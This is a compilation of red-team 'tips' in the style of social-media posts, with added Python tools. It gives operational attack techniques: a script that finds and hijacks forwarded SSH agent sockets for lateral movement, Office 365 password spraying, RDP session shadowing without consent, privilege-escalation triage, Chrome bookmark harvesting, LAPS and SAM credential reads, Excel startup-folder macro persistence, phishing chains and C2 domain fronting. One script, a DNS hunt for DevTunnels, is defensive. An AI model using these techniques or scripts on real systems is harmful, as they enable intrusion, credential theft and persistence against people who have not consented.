Took all those "Red Team Tips" and stuck it onto one page: I'll update this page occasionally
#redteam #adversarysimulation #cyber
Also, I want to add that there's some duplicate numbering :( Ah well...
The fuck, what kind of vulnerability is CVE-2023-24044?
You can modify the host header so that it redirects to the attacker's domain instead. What is this bullshit? How did it even get a CVE?
Red Tip #434: SSH agent forwarding can be exploited to advance your presence on a network without SSH keys or passwords. If you are root (or the same user) on a host where someone connected with ssh -A, point SSH_AUTH_SOCK at their /tmp/ssh-*/agent.* socket and their agent will sign for you, so the next hop lets you in without you ever seeing a key. @int0x08 has an example command snippet (link omitted). Great for when you have a shell but no credentials.
#redteam #cyber #sshagent
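As an added example (mine, not from the tip and not @int0x08's snippet), a small Python helper that does what the tip describes: enumerate the forwarded-agent sockets OpenSSH leaves under /tmp/ssh-*/agent.*, test each one with ssh-add -l, and print the SSH_AUTH_SOCK one-liner for the live ones. It assumes Linux, OpenSSH's default socket layout, that you are root (the socket directories are mode 0700, so as another user you only ever see your own), that ssh-add is on PATH, and that "<next-hop>" is a placeholder you fill in.

```python
"""Added example, not from the tip or from @int0x08's snippet: find forwarded
ssh-agent sockets on a host you already control and test which ones are live.

Assumptions: Linux, OpenSSH's default socket layout /tmp/ssh-<random>/agent.<pid>,
root (or the same uid as the victim, since the directories are mode 0700),
and ssh-add on PATH. "<next-hop>" below is a placeholder.
"""
import os
import pwd
import stat
import subprocess
from typing import List, Tuple


def find_agent_sockets(base: str = "/tmp") -> List[Tuple[str, str]]:
    """Return (socket_path, owner) for every ssh-agent socket under base."""
    found: List[Tuple[str, str]] = []
    if not os.path.isdir(base):
        return found
    for entry in sorted(os.listdir(base)):
        if not entry.startswith("ssh-"):
            continue
        d = os.path.join(base, entry)
        try:
            names = sorted(os.listdir(d))
        except OSError:
            continue  # someone else's 0700 dir and we are not root
        for name in names:
            if not name.startswith("agent."):
                continue
            path = os.path.join(d, name)
            st = os.lstat(path)
            if not stat.S_ISSOCK(st.st_mode):
                continue  # stray file, not an agent socket
            try:
                owner = pwd.getpwuid(st.st_uid).pw_name
            except KeyError:
                owner = str(st.st_uid)
            found.append((path, owner))
    return found


def list_agent_keys(sock_path: str) -> Tuple[int, str]:
    """Run `ssh-add -l` against one socket.

    Exit 0 plus a list of fingerprints means the remote user's agent will sign
    for us; exit 2 means the socket is dead (they disconnected).
    """
    env = dict(os.environ, SSH_AUTH_SOCK=sock_path)
    proc = subprocess.run(["ssh-add", "-l"], env=env, capture_output=True, text=True)
    return proc.returncode, (proc.stdout + proc.stderr).strip()


def hijack_command(sock_path: str, user: str, target: str) -> str:
    """The pivot one-liner: reuse the victim's agent for the next hop."""
    return f"SSH_AUTH_SOCK={sock_path} ssh {user}@{target}"


if __name__ == "__main__":
    for path, owner in find_agent_sockets():
        code, out = list_agent_keys(path)
        print(f"[{'LIVE' if code == 0 else 'dead'}] {path} (owner: {owner})")
        if code == 0:
            print("    " + out.replace("\n", "\n    "))
            print("    " + hijack_command(path, owner, "<next-hop>"))
```

Dead sockets are common: the directory survives after the admin logs out, so always check with ssh-add -l before getting excited. The agent never hands over the private key itself; it only signs challenges, which is exactly why this works without credentials and why it stops working the moment the admin disconnects.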
Red Team 2.0 appears to become:
1) Get given a machine on the internal network because the phish failed.
2) Disable EDR because they can't seem to bypass the EDR.
3) Can't figure out how to pivot between network segments.
4) ...
Dude, why not just ask to be put on the core banking system?
Alternatives to the whoami.exe command (handy when whoami.exe is blocked or alerted on):
echo %USERNAME%
echo %USERDOMAIN%
systeminfo
wmic ComputerSystem get Username
net user %username%
query user
dir C:\Users
reg query "HKCU\Volatile Environment"
@LisaMayOfficial @FightHaven
The store lost $100 in cash when the man stole the $100 bill from the register. However, when the man used the stolen $100 bill to buy $70 worth of goods and received $30 in change, the store did not lose any additional money. So, the total amount the store lost was $100 due to…
Red Tip #344: Set HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fSingleSessionPerUser /t REG_DWORD /d 0 (note the space in "Terminal Server") to allow multiple sessions per user on a server. Useful if you want to log in to the jump host but that guy's just on it all day long... 😶 You need local admin on the host to change it, and a second session for the same account is visible to anyone who runs qwinsta.
Red Tip #429: Looking for login credentials? Don't forget to try default credentials other than admin:admin (link omitted): a fantastic cheat sheet of the major default credentials to try for various products.
#redteam #cyber
Why is Red Teaming so undervalued? Is it just me? Blue teams are implementing controls that don't work like 80% of the time for tens of millions of dollars. Yet most orgs are skimping out on paying for Red Team who's going to tell you what went wrong?
Why I quit bug bounty, and I'm constantly being reminded:
Get paid a fucking 10 USD for an authentication bypass + remote code execution chain that can be used to attack their domain controllers.
Red Tip #437: Pwndrop is a customized web and WebDAV server that can be used to serve documents and payloads with a few extra features. @kgretzky made a fantastic GUI and it's super easy to use! (Link and video omitted.)
#redteam #cybersecurity
YOLO, I joined cyber not even knowing how the TCP stack really worked, or how IP networking worked. University was all textbooks.
OSCP just pushed me into more practical execution and understanding through testing / trial and error.
Red Tip #345: When placing Excel macro backdoors into the Excel startup folder (%APPDATA%\Microsoft\Excel\XLSTART), you don't have to name the file Personal.xlsb; you can also call it a.txt. Excel tries to open every file in XLSTART whatever its extension, so it still loads when Excel starts. 😊 Bonus point: that per-user XLSTART sits under the roaming profile, so where roaming profiles are in use it follows the user to whatever machine they log on to next.
DevTunnels: blue teams are going to start hunting for them (link omitted). Get ready ahead of time and know the domains the tunnel traffic resolves, e.g.:
global.rel.tunnels.api.visualstudio.com
tunnels-prod-rel-tm.trafficmanager.net
*.app.github.dev
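An added example (mine, not from the original post) of the defender's side of this: a suffix-match hunt over resolver logs for the domains listed above. The log lines are constructed in a dnsmasq-like format, so adjust QUERY_RE for whatever your resolver writes. The *.devtunnels.ms line is there from my own knowledge of the service (tunnel URLs themselves use that suffix); it is deliberately left out of the default suffix list so the example shows what the tip's three entries alone would miss until you add it.

```python
"""Added example, not from the original post: hunt resolver logs for the
DevTunnels / Codespaces domains listed above.

The log lines are constructed in a dnsmasq-like format; adjust QUERY_RE for
your resolver. "devtunnels.ms" is added from my own knowledge of the service
(tunnel URLs look like <id>-<port>.<region>.devtunnels.ms) and is deliberately
left out of the default suffix list to show what the tip's list alone misses.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List

# Suffixes from the tip. "*.app.github.dev" becomes "any label under app.github.dev".
TUNNEL_SUFFIXES = (
    "global.rel.tunnels.api.visualstudio.com",
    "tunnels-prod-rel-tm.trafficmanager.net",
    "app.github.dev",
)

# "query[TYPE] name from client", dnsmasq style; see the constructed sample below.
QUERY_RE = re.compile(r"query\[(?P<qtype>\w+)\] (?P<name>\S+) from (?P<client>\S+)")

SAMPLE_LOG = """\
Jan 12 09:01:03 dnsmasq[712]: query[A] www.microsoft.com from 10.0.4.21
Jan 12 09:01:07 dnsmasq[712]: query[A] global.rel.tunnels.api.visualstudio.com from 10.0.4.21
Jan 12 09:01:08 dnsmasq[712]: query[A] 8vgq2x4h-8080.euw.devtunnels.ms from 10.0.4.21
Jan 12 09:02:15 dnsmasq[712]: query[A] tunnels-prod-rel-tm.trafficmanager.net from 10.0.9.7
Jan 12 09:02:20 dnsmasq[712]: query[AAAA] fancy-space-abc-3000.app.github.dev from 10.0.9.7
Jan 12 09:03:00 dnsmasq[712]: query[A] notapp.github.dev.evil.example from 10.0.1.1
Jan 12 09:03:05 dnsmasq[712]: query[A] github.dev from 10.0.1.1
"""


def matches_suffix(name: str, suffixes: Iterable[str]) -> bool:
    """True if name equals a suffix or is a subdomain of it. The match is on a
    label boundary, so notapp.github.dev.evil.example does not hit app.github.dev."""
    name = name.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in suffixes)


def find_tunnel_lookups(log: str, suffixes: Iterable[str] = TUNNEL_SUFFIXES) -> List[Dict[str, str]]:
    """Return one dict per matching query: client, name, qtype, raw line."""
    suffixes = tuple(s.lower() for s in suffixes)
    hits: List[Dict[str, str]] = []
    for line in log.splitlines():
        m = QUERY_RE.search(line)
        if m and matches_suffix(m.group("name"), suffixes):
            hits.append({"client": m.group("client"), "name": m.group("name"),
                         "qtype": m.group("qtype"), "line": line})
    return hits


def clients_by_hits(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Which internal hosts are talking to tunnel infrastructure, and how often."""
    return dict(Counter(h["client"] for h in hits))


if __name__ == "__main__":
    hits = find_tunnel_lookups(SAMPLE_LOG)
    for h in hits:
        print(f"{h['client']:<12} {h['qtype']:<5} {h['name']}")
    print(clients_by_hits(hits))
    # With the client-facing suffix added, the devtunnels.ms lookup is caught too.
    print(len(find_tunnel_lookups(SAMPLE_LOG, TUNNEL_SUFFIXES + ("devtunnels.ms",))))
```

The suffix list is the whole detection, so from the operator's side the lesson is the same one the tip makes: every one of these names is fixed infrastructure, and a resolver log is enough to find it once someone bothers to look.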
Neat command from IppSec :D
find / -newermt "2021-02-12" ! -newermt "2021-02-19" -ls 2>/dev/null | grep -v ' /etc\| /var/lib\| /sys\| /proc\| /boot'
It lists files modified between the two dates (the ! on the second -newermt is what makes it a range; two plain -newermt tests would just mean "newer than the later date"), so starting from when a box was built it finds the stuff the author planted for the CTF :D
Red Tip #427: Directory discovery for all your URLs in one command, formatted to a nice HTML file for browsing. You can try other output formats (-of json, csv, md) for grepping etc.
ffuf -w targets-alive.txt:URL -w wordlist.txt -u URL/FUZZ -mc 200,403 -o targets-report.html -of html
With two wordlists ffuf defaults to clusterbomb mode, so every entry in targets-alive.txt (scheme included, no trailing slash) gets every word from wordlist.txt.
#recon #cyber
Red Tip #425: CVE-2020-16938 allows privileged file read by EVERYBODY according to @jonasLyk. You can PoC it with 7-Zip by navigating to the device path \\.\PhysicalDrive0\Basic data partition.img\Windows\System32\Config\, which is where the SAM and SYSTEM hives live.
#redteam #cyber
Red Tip #325: WPA2-PSK can be cracked in Hashcat too, just in case you were not aware. Build cap2hccapx (from hashcat-utils), convert the handshake .cap to .hccapx, then crack it with Hashcat mode 2500 :) On current Hashcat (6.0 and later) 2500 is deprecated: convert with hcxpcapngtool from hcxtools to a .hc22000 file and use mode 22000 instead, which handles both EAPOL handshakes and PMKIDs.
Red Tip #337: Have a low-privileged Office 365 account? Pivot over to (link omitted) after logging in and you can access the Azure AD. If they're syncing on-prem AD you suddenly get to view all the groups. Also check out the Azure CLI. By default any member can read users and groups this way; a tenant can block the portal for non-admins under user settings, but that only hides the UI, not the directory reads the CLI makes underneath. From @ustayready's @WWHackinFest talk!
Red Tip #303: Look for open S3 buckets using (link omitted). I found 1400 buckets in about 1 hour. Good practice to make sure your client isn't vulnerable to this, and on a red team you might be able to use such buckets to serve payload stages or set up watering-hole attacks.
Red Tip #435: Found GitLab but no credentials? That pesky sign-in page is blocking you off? Try navigating to /explore or /explore/snippets to see if there's anything useful. Both list public projects and snippets to anonymous users unless the admin has restricted public visibility, and /api/v4/projects returns the same public project list as JSON.
#Redteam #GitLabSnippets
Red Tip #421: Do you know how to trivially & remotely hijack an #RDP session without prompt nor warning on the user's side, using a #Microsoft signed binary (no patch, no multi-session)? qwinsta + mstsc shadowing is the answer ;) List the sessions with qwinsta /server:HOST, then mstsc /v:HOST /shadow:ID /control /noConsentPrompt. The no-prompt part depends on the Shadow policy on the target (HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services, value Shadow = 2 for full control without the user's permission), which takes local admin to set; otherwise the user gets a consent pop-up. Details: @kmkz_security
Red Tip #343: When a Google Drive document asks you to request permission, you can try that. But also try sticking /pubhtml on the end of the URL to see if they've published a copy that you can view without it.
Red Tip #436: ProjectDiscovery have a tool called Nuclei, with constantly community-updated templates that help quickly identify the low-hanging fruit and fingerprint a perimeter when you don't want to go full-on vulnerability scanner (link omitted).
#cyber
Red Tip #415: STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use smbpasswd -r domain.fqdn -U username to change the password over SMB so you can use the account. Be aware the change is noisy: the real user's next logon with the old password fails, so time it and write it down.
#cyber #redteam
Red Tip #328: Need to spray Office 365? Use (link omitted). Tried and tested this tool and it works really fast and well in Python. Just do --threads 3000 and --password Welcome1. As all operators know, you don't have time to be testing tools in the middle of a gig. :)
Red / Blue Team Tip: If you're still reading e-mail message headers in Notepad, you're doing it wrong. Check out Message Header Analyzer (link omitted). It'll save your eyes 🤯
#cyber #redteam #blueteam #suspiciousemails
Getting started with Threat Hunting:
1) Install Splunk
2) Sysmon all the endpoints using GPO
3) Send all logs to Splunk using Sysmon TA
4) Run saved queries :D
Red Tip #423: Escalate privileges on a Windows system if your token holds any of the following: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege. Check with whoami /priv. A privilege shown as Disabled is still held by the token and the process can enable it itself, so don't skip those. @elc0rr3Km1n0s
#cyber #redteam
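An added example (mine, not from the tip): parse the output of whoami /priv and pull out the privileges listed above, with a one-line note on what each one is typically abused for. SAMPLE_WHOAMI_PRIV is a constructed sample of what a service-account shell usually shows; the abuse notes are my own summary, not the tip's.

```python
"""Added example, not from the tip: parse `whoami /priv` output and flag the
privileges that are worth trying to escalate with. SAMPLE_WHOAMI_PRIV is a
constructed sample; the abuse notes are brief and mine."""
import re
from typing import Dict, List, Tuple

# The tip's list, written out as the names whoami /priv actually prints.
DANGEROUS: Dict[str, str] = {
    "SeImpersonatePrivilege": "token impersonation (Potato family) to SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "same idea, assign the stolen token to a new process",
    "SeTcbPrivilege": "act as part of the OS, e.g. LsaLogonUser with extra SIDs",
    "SeBackupPrivilege": "read any file regardless of ACL: SAM/SYSTEM hives, NTDS.dit",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeCreateTokenPrivilege": "forge a token with arbitrary groups",
    "SeLoadDriverPrivilege": "load a signed-but-vulnerable driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object, then rewrite its DACL",
    "SeDebugPrivilege": "open any process, e.g. LSASS for credential dumping",
}

# name, description, state; the description is single-spaced, the state is last.
PRIV_LINE = re.compile(r"^(Se\w+)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# constructed sample of `whoami /priv` from a service-account shell
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled'. Header and ruler lines are skipped."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def dangerous_privileges(text: str) -> List[Tuple[str, str]]:
    """(name, state) for each held privilege that is in DANGEROUS, in output order.

    Disabled ones are kept on purpose: a process can enable any privilege its
    token holds via AdjustTokenPrivileges, so they are just as usable."""
    return [(n, s) for n, s in parse_whoami_priv(text).items() if n in DANGEROUS]


if __name__ == "__main__":
    for name, state in dangerous_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:<32} {state:<9} -> {DANGEROUS[name]}")
```

Feed it the real thing with whoami /priv > priv.txt and parse_whoami_priv(open("priv.txt").read()); the point of keeping Disabled entries is the one the tip's check can hide: a service account with SeImpersonatePrivilege listed as Disabled is still a SYSTEM shell waiting to happen.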
Ransomware defense: every EDR company is telling people to install EDR, but in reality their EDR probably won't even detect AnyDesk. You should be red teaming instead.
Red Tip #402: Need to proxy Linux tools? proxychains4. Need to proxy Windows tools like ADExplorer or Remote Desktop? Try ProxyCap or Proxifier.
#cyber #operations #redteam
Neat trick with Windows when you want to leave SSH tunnels in the background (bash):
screen -S tunnel
ssh -L 8080:localhost:8080 <user>@<host>
Close the terminal. The screen session just detaches, so the tunnel stays running :) Get it back later with screen -r tunnel.
1. The cloud is just someone else’s computer.
2. When that someone tells you they can’t view your data, all they mean is they have a rule to say they shouldn’t. Rarely a technical control to prevent it.
Red Tip #404: Run an easy phishing campaign and obtain the list of users who clicked. Then send a follow-up e-mail from a "training platform" asking them to complete their awareness training by launching an application. The idea is that multi-stage phishing is more convincing.
#cyber #redteam
Using Cloudflare for IP address filtering in red team operations: wrote it up for reference (link omitted), and because Cloudflare is pretty awesome. You can also play around with the other features! 🔥 (cc @curi0usjack, @shantanukhande)
#redteam #cybersecurity
Red Tip #320: List Chrome bookmarks with one line:
type "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr "name url" | findstr /v "type"
(findstr "name url" matches lines containing either word, and the /v "type" pass drops the "type": "url" lines, leaving just titles and URLs. The live Bookmarks file in the same folder is the same JSON.) Thanks @francisacer1 for the path to Bookmarks.bak :D
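An added example (mine, not from the tip): the Bookmarks file is JSON, so rather than grep it, walk the tree properly and pull out folder path, title and URL, then filter for URLs that point at internal names or private addresses, which is what you actually want out of a target's bookmarks. SAMPLE_BOOKMARKS is a constructed file in the real layout; default_bookmark_paths() assumes the standard Chrome profile location the tip uses, and the fallback C:\Users\<user>\... string is a placeholder.

```python
"""Added example, not from the tip: parse Chrome's Bookmarks file (JSON) and
pull out folder path, title and URL, then keep the ones that point at internal
hosts. SAMPLE_BOOKMARKS is constructed; default_bookmark_paths() assumes the
standard Chrome profile location from the tip."""
import ipaddress
import json
import os
from typing import Iterator, List, Tuple
from urllib.parse import urlsplit

Bookmark = Tuple[str, str, str]  # (folder path, title, url)

# constructed sample in the real file's layout (checksum/guids/dates trimmed)
SAMPLE_BOOKMARKS = json.dumps({
    "roots": {
        "bookmark_bar": {"name": "Bookmarks bar", "type": "folder", "children": [
            {"name": "HR portal", "type": "url", "url": "https://intranet.corp.example.local/hr"},
            {"name": "Admin", "type": "folder", "children": [
                {"name": "Jenkins", "type": "url", "url": "http://10.0.0.5:8080/jenkins"},
            ]},
        ]},
        "other": {"name": "Other bookmarks", "type": "folder", "children": [
            {"name": "Google", "type": "url", "url": "https://www.google.com/"},
        ]},
        "synced": {"name": "Mobile bookmarks", "type": "folder", "children": []},
        "sync_transaction_version": "1",
    },
    "version": 1,
})


def walk(node: dict, path: Tuple[str, ...] = ()) -> Iterator[Bookmark]:
    """Depth-first over a folder/url tree, yielding url nodes with their folder path."""
    if node.get("type") == "url":
        yield ("/".join(path), node.get("name", ""), node.get("url", ""))
        return
    for child in node.get("children", []):
        yield from walk(child, path + (node.get("name", ""),))


def extract_bookmarks(raw_json: str) -> List[Bookmark]:
    data = json.loads(raw_json)
    out: List[Bookmark] = []
    for root in data.get("roots", {}).values():
        if isinstance(root, dict):  # skips sync_transaction_version and the like
            out.extend(walk(root))
    return out


def is_internal(url: str) -> bool:
    """Private IP, single-label host, or a typical internal TLD."""
    host = urlsplit(url).hostname or ""
    if not host:
        return False  # javascript: bookmarklets, mailto:, etc.
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        pass
    return "." not in host or host.endswith((".local", ".corp", ".internal", ".lan"))


def internal_only(bookmarks: List[Bookmark]) -> List[Bookmark]:
    return [b for b in bookmarks if is_internal(b[2])]


def default_bookmark_paths() -> List[str]:
    """Live file first, then the .bak the tip uses (both are the same JSON)."""
    local = os.environ.get("LOCALAPPDATA", r"C:\Users\<user>\AppData\Local")
    profile = os.path.join(local, "Google", "Chrome", "User Data", "Default")
    return [os.path.join(profile, "Bookmarks"), os.path.join(profile, "Bookmarks.bak")]


if __name__ == "__main__":
    raw = SAMPLE_BOOKMARKS
    for p in default_bookmark_paths():  # use the real file when we are on the box
        if os.path.exists(p):
            with open(p, encoding="utf-8") as f:
                raw = f.read()
            break
    for folder, title, url in internal_only(extract_bookmarks(raw)):
        print(f"{folder:<25} {title:<15} {url}")
```

The internal filter is a heuristic: extend the TLD tuple with whatever the target's AD forest actually uses, and remember that a bookmark to a public SaaS login page with the company name in the path is often just as useful as an intranet link.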
Red Tip #310: SOC is looking for new, never-before-seen domains with a low user/access count, and you can't domain front because of an RFC 2616-compliant proxy? When doing the phish, add invisible image links to your C2 domain so that multiple users will have loaded the C2 domain before you use it.
Red Tip #422: Identify whether a domain is hosted on an S3 bucket by requesting /%C0 (an invalid UTF-8 byte). S3 answers with a 400 Bad Request and its own distinctive XML error body (the screenshot from the original isn't reproduced here).
#redteam #cyber
Red Tip #282: Although I thought it was clear since Microsoft documented it, LAPS passwords sit in clear text in AD (the ms-Mcs-AdmPwd attribute on each computer object) and are readable by any user with read rights on that attribute. Friendly reminder :) Either just browse LDAP or use (links omitted). @harmj0y @kfosaaen
A new update to the ATT&CK Group to Technique repository! @msgeekuk has given us a lot of fancy changes in the spreadsheet, and we also have colour coding. Get the repository at (link omitted).
I've got to say, one of my favourite commands to date is: powershell Get-WmiObject -Class MicrosoftDNS_AType -Namespace Root\MicrosoftDNS -ComputerName DCNAME (dumps every A record the DC's DNS server holds, straight from the MicrosoftDNS WMI provider, no zone transfer needed).
[NEW POST] HAMMERTHROW: Rotate my domain. Automating the process of changing staging and beacon domains in @armitagehacker's Cobalt Strike. This makes it more difficult for defenders to detect all domains in use.
#redteam
Red Tip #274: Password cracking is hard. I love Top297Million-Probable; rockyou was decent for a quick smash, but lately I found out about keyboard walks. Add keyboard walks with rules to your cracking routines to get more hashes cracked! Share your ideas!
Given the feedback from some of the companies who run the products on the list, here's a revamped version without certain products. Let's hope everyone can learn to maximise coverage using multiple products, or understand the scope of their EDR's coverage. cc @MrUn1k0d3r
#redteam
ThreadStackSpoofer: a PoC for an advanced in-memory evasion technique by @mariuszbit. Worth following his work as he releases a lot of PoCs and tooling for the latest techniques and concepts! 👇 Check it out here (link omitted) 🤯
#redteam #OST
How do you prevent a zero-day exploit attack? You don't. You block the next step of the attack to minimise the impact of the zero-day. If you have many layers of controls, it minimises the impact of the zero-day: good network segmentation, endpoint / server controls, etc.
Red Tip #284: Windows Credential Vault is often used to store saved passwords. @_rastamouse walks us through the decryption procedure required to make use of these credentials in his blog post (link omitted)!
[NEW POST] For the #RedTeam who use CloudFront for domain fronting: similar to Aliyun, set arbitrary Host headers :) Check this out (link omitted). As always, I confirm any techniques and findings using @armitagehacker's Cobalt Strike. cc @bluscreenofjeff @001spartan
Red Tip #315: If you HAVE to spray for creds, use Kerberos spraying, as @ropnop pointed out: the level of auditing is far less by default and invalid attempts aren't logged (a failed pre-auth is event 4771, which only appears when Audit Kerberos Authentication Service is switched on, rather than a 4625 for every NTLM failure). Wrong passwords still count toward the lockout threshold, so keep the spray slow.
Why I see myself as a hacker more than a developer. Part 1.
1) I write code that barely works, not factored, not optimized.
2) I write obfuscation better than I write code.
3) I still can't get a proper UI going.
4) My code achieves the task, only.
Red Tip #321: Want to find out if the current network has an externally exposed interface, e.g. wireless networks? An easy way is to visit (link omitted) on ports 22, 80 and 443 for a quick idea. You might find that your current network has another way in!
New blog post on using Alibaba CDN for domain fronting, and some of its benefits. My examples use @armitagehacker's Cobalt Strike, but you can use any other C2 software.
#redteam #security